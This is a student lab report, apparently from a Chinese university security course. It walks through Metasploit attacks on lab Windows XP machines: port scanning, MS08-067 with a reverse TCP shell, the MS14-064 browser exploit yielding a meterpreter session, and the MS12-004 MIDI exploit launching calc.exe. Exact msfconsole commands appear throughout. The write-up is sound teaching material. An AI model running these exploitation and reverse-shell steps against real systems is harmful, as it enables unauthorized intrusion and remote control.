20202409 2022-2023-2 《网络与系统攻防技术》实验六实验报告

1.实验内容

本周实验内容主要是学习metasploit的使用方法,并完成一些实践任务。重点有以下三种常用的攻击方式和思路:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

要求须成功应用任意一个辅助模块。

2.实验过程

2.1主动攻击

本次实践通过检测网络服务漏洞来实施主动攻击。我们利用metasploit辅助模块检测靶机开放的端口来搜寻可能存在的漏洞,然后利用它的攻击模块进行攻击测试。

1.在kali虚拟机上ping目标靶机,可ping通:
在这里插入图片描述

2.使用msf辅助模块portscan来探测靶机的开放端口:

//开启metasploit交互终端
service postgresql start
msfdb init//已初始化过的可以运行命令msfdb run,效果等同于msfdb start + msfconsole
msfconsole
//搜索辅助模块portscan,选择对tcp端口进行扫描的模块
search portscan
use 5

在这里插入图片描述*2.设置需要的参数,主要是靶机IP,可以多设些线程,提高运行速度,开启扫描,发现xp靶机开放了tcp135、139和445端口:

set RHOST 192.168.197.136
set THREADS 10
show options
run

在这里插入图片描述

3.注意到445端口开放,可利用ms08-067漏洞模块进行攻击,可用以下命令检测主机是否可被攻破。结果显示vulnerable,我们开始着手使用该模块作渗透测试。

nmap -p 445 192.168.197.136 --script=smb-vuln-ms08-067

在这里插入图片描述4.进入metasploit交互终端,搜索ms08-067模块,并运用该模块。

search ms08-067
//搜索到一个结果,其编号为0
use 0

在这里插入图片描述5.设置payload为generic/shell_reverse_tcp,和RHOST为靶机ip,并检查设置。

set payload generic/shell_reverse_tcp
set RHOST 192.168.197.136
show options

在这里插入图片描述

6.启动渗透,可以成功获得xp靶机的shell(对老版windows命令不太熟悉,试错了好多):

run //或者exploit

在这里插入图片描述

2.2针对浏览器的攻击

在metasploit中搜索browser相关的模块,选取rank高的进行渗透测试,多次尝试均失败,ie浏览器会在渗透过程中关闭进程,原因不明。参考了学姐的博客,我改用ms14_064_ole_code_execution进行渗透测试,第一次失败,紧接着第二次换了一个端口竟然成功了,unbelievable!

1.转到ms14_064_ole_code_execution模块,填写相关参数:SRVHOST、LHOST、LPORT、AllpwPowerShellPrompt,检查相关参数设置。

use exploit/windows/browser/ms14_064_ole_code_execution
set SRVHOST 192.168.197.130
set AllowPowerShellPrompt true
set LHOST 192.168.197.130
set LPORT 9024
show options

在这里插入图片描述2.启动测试,获得一段用于攻击的网址,用靶机的IE浏览器访问它。

exploit

在这里插入图片描述

在这里插入图片描述

2.等待一段时间后,会话新建成功,选择进入一个会话,成功获取靶机shell。

exploit
//meterpreter成功新建一个会话
sessions//列出所有会话
session -i 1//转到第一个会话,成功获取shell,可以执行相关命令

在这里插入图片描述

2.3针对客户端的攻击(ms_12_004)

本次实践针对xp系统的windows media player所带有的漏洞,利用metasploit的ms_12_004_midi模块对靶机进行渗透测试,我们可以获取系统权限,弹出运行计算机程序。

1.搜索并进入相应的模块,设置参数如下:

set payload windows/exec
set cmd calc.exe
set URIPATH auto
show options

在这里插入图片描述2.exploit运行,复制网址,粘贴入靶机IE浏览器搜索栏搜索。结果:xp靶机弹出计算机程序。
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

3.问题及解决方案

问题1:中文版xp系统永恒之蓝漏洞复现无法完成
问题1解决方案:重装原版(英文版)的xp系统
问题2:exploit后出现address already in use
问题2解决方案:问题的出现伴随着所种可能性:1.参数配置有问题,需要理解参数的具体含义,避免配置错误;2.kali主机的监听端口被占用,有两种选择:杀死占用端口的进程,或者更换监听端口。

4.学习感悟、思考等

本次实验也花了很多时间去完成,依然拖到了实验课的下一周才彻底结束,过程中不是很顺利,碰到了各种各样的问题。但是,碰到问题实在太正常了,顺利也不是能够苛求的,终归也从中学到了不少知识,还磨炼了自己应对困难的心态。本次实验主要是基于metasploit,操作起来毫无难度,理解原理才应该是重头戏。可是,我感觉自己尚未有严肃研究某个漏洞的基础,在metasploit渗透框架下,我就如孩童一样只是在“玩”这些漏洞而已,希望能够趁热打铁,努力提高自己的水平,作为一个网络空间安全专业的学生,这是难以推脱的使命。

参考资料
1.Metasploit渗透测试基础
2. Metasploit主动攻击
3. 针对浏览器的攻击
4. 针对客户端的攻击

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值